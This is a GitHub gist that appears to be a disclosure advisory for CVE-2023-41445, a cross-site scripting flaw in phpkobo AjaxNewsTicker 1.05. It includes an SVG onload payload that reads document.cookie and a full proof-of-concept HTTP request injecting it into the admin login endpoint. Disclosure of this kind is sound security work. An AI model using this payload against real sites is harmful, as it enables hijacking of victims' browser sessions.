Skip to content

Instantly share code, notes, and snippets.

Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save RNPG/84cac1b949bab0e4c587a668385b052d to your computer and use it in GitHub Desktop.
Save RNPG/84cac1b949bab0e4c587a668385b052d to your computer and use it in GitHub Desktop.
CVE-2023-41445
Vulnerability Type: Cross Site Scripting (XSS) Vulnerability
Vendor of Product: phpkobo
Affected Product Code Base: AjaxNewsTicker
Product Version: 1.05
Description: Cross Site Scripting vulnerability in phpkobo AjaxNewTicker v.1.0.5 allows a remote attacker to execute arbitrary code via a crafted payload to the index.php component.
Attack Vectors: To exploit this vulnerability the victim must click on the malicious link and then the payload will be executed on the victim's browser.
Attack Type: Remote
Payload: <svg%20onload=alert(document.cookie)>
Assigned CVE-ID: CVE-2023-41445
Discoverer: Alireza AmirHeydari, Raspina Net Pars Group (RNPG Ltd.)
Steps To Reproduce
1. Browse the the following URL: http://<target.xyz>/ntic/admin/login
2. Attacker can create his/her malicious payload and send the crafted malicious link to the victim in order to be executed on his/her browser.
#PoC
GET /ntic/admin/index.php?_rtp=login&_be=1&requ=%7B%22cmd%22%3A%22<svg%20onload=alert(document.cookie)>%22%2C%22form%22%3A%7B%22username%22%3A%22test%22%2C%22password%22%3A%22test%22%7D%7D HTTP/1.1
Host: target.xyz
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Origin: http://target.xyz
Connection: close
Referer: http://target.xyz/ntic/admin/index.php?_rtp=login
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment